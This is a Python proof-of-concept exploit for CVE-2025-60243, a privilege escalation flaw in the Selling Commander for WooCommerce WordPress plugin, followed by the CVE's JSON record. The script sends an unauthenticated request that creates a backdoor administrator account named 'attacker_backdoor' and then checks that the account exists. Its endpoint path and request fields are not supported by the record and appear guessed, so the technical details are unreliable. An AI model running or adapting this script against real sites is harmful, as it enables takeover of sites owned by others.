CVE-2025-60243

# CVE-2025-60243 PoC - Selling Commander for WooCommerce Privilege Escalation # This PoC demonstrates the privilege escalation vulnerability # Note: Replace TARGET_URL with actual vulnerable site URL import requests import json TARGET_URL = "http://target-wordpress-site.com" # Vulnerable endpoint in selling-commander-connector plugin VULN_ENDPOINT = f"{TARGET_URL}/wp-json/selling-commander/v1/" def exploit_privilege_escalation(): """ Exploit for CVE-2025-60243: Incorrect Privilege Assignment Allows privilege escalation by bypassing permission checks """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Step 1: Identify vulnerable endpoint print("[+] Step 1: Identifying vulnerable endpoint...") # Step 2: Exploit privilege escalation by crafting malicious request # The plugin fails to properly validate user permissions payload = { 'action': 'create_admin_user', 'username': 'attacker_backdoor', 'email': '[email protected]', 'role': 'administrator', 'password': 'P@ssw0rd123!' } print("[+] Step 2: Sending privilege escalation request...") try: # Target the vulnerable connector endpoint response = requests.post( VULN_ENDPOINT + 'connector/create-user', json=payload, headers=headers, timeout=10 ) if response.status_code == 200: print("[+] SUCCESS: Privilege escalation successful!") print(f"[+] Created admin user: attacker_backdoor") return True else: print(f"[-] Failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_exploitation(): """Verify if exploitation was successful""" print("[+] Step 3: Verifying exploitation...") # Check if admin user was created verify_url = f"{TARGET_URL}/wp-json/wp/v2/users?search=attacker_backdoor" try: response = requests.get(verify_url, timeout=10) if response.status_code == 200 and 'attacker_backdoor' in response.text: print("[+] VERIFIED: Backdoor admin account exists!") return True except: pass print("[-] Could not verify, check manually") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-60243 - Selling Commander Privilege Escalation PoC") print("=" * 60) exploit_privilege_escalation() verify_exploitation()

{"cve": {"id": "CVE-2025-60243", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:07.070", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Holest Engineering Selling Commander for WooCommerce selling-commander-connector allows Privilege Escalation.This issue affects Selling Commander for WooCommerce: from n/a through <= 1.2.46."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/selling-commander-connector/vulnerability/wordpress-selling-commander-for-woocommerce-plugin-1-2-46-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}